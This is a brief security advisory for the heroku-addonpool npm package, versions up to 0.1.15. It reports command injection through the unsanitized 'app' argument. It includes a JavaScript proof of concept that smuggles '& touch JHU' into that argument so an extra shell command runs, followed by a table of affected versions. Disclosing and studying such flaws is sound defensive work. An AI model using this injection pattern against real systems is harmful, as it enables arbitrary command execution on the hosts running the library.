heroku-addonpool through 0.1.15 is vulnerable to Command Injection. The second parameter (`app`) of the exported function `HerokuAddonPool(id, app, opt)` is user-controllable and is used without any sanitization.
PoC
```javascript
var Root = require("heroku-addonpool");
// The second argument (the app name) is used without sanitization; the shell
// metacharacter "&" chains an additional command onto the one the library
// runs, so "touch JHU" executes.
var root = Root("sss", "& touch JHU", {});
root.setup();
```
| CPE | Name | Operator | Version |
|---|---|---|---|
| | heroku-addonpool | lt | 0.1.16 |